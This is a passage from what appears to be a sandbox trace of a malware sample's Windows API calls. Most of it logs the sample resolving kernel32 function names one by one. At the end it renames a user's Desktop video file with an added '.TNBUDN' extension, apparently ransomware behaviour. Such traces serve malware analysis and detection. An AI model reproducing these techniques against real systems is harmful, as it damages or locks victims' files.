returned="CreateDirectoryTransactedW" [0083.591] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.591] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.591] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.591] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.591] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.591] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.591] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.591] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.591] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.591] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.591] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.591] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.591] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.592] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.592] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.592] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.592] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.592] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.592] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.592] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.592] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.592] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.592] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.592] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.592] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.592] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.592] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.592] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.592] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.592] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.592] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.592] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.593] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.593] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.593] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.593] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.593] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.593] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.593] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.593] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.593] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.593] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.593] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.593] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.593] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.593] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.593] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.593] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.593] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.593] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.593] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.593] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.594] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.594] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.594] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.594] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.594] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.594] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.594] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.594] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.594] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.594] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.594] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.594] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.594] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.594] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.594] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.594] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.594] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.594] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.594] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.595] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.595] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.595] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.595] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.595] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.595] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.595] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.595] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.595] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.595] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.595] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.595] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.595] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.595] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.595] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.595] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.595] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.595] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.595] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.595] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.595] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.595] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.595] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.595] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.595] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.595] lstrlenA (lpString="DELETEATOM") returned 10 [0083.595] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.595] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.595] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.595] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.595] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.595] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.595] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.595] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.595] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.595] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.595] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.596] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.596] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.596] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.596] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.596] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.596] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.596] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.596] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.596] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.596] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.596] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.596] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.596] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.596] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.596] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.596] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.596] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.596] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.596] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.596] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.596] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.596] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.596] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.596] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.596] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.596] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.596] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.596] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.596] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.596] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.596] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.596] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.596] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.596] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.596] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.596] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.597] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.597] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.597] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.597] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.597] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.597] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.597] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.597] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.597] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.597] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.597] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.597] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.597] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.597] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.597] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.597] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.597] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.597] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.597] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.597] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.597] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.597] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.597] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.597] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.597] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.597] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.597] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.597] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.597] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.597] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.597] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.597] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.597] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.598] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.598] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.598] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qUqlKc5CiBNKH6.mkv") returned 56 [0083.598] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qUqlKc5CiBNKH6.mkv.TNBUDN") returned 63 [0083.598] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qUqlKc5CiBNKH6.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\quqlkc5cibnkh6.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qUqlKc5CiBNKH6.mkv.TNBUDN" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\quqlkc5cibnkh6.mkv.tnbudn"), dwFlags=0x0) returned 1 [0083.598] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.599] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.599] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.599] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe14daa0, ftCreationTime.dwHighDateTime=0x1d4cff2, ftLastAccessTime.dwLowDateTime=0x37bd44e0, ftLastAccessTime.dwHighDateTime=0x1d4d11b, ftLastWriteTime.dwLowDateTime=0x37bd44e0, ftLastWriteTime.dwHighDateTime=0x1d4d11b, nFileSizeHigh=0x0, nFileSizeLow=0xffa3, dwReserved0=0x0, dwReserved1=0x0, 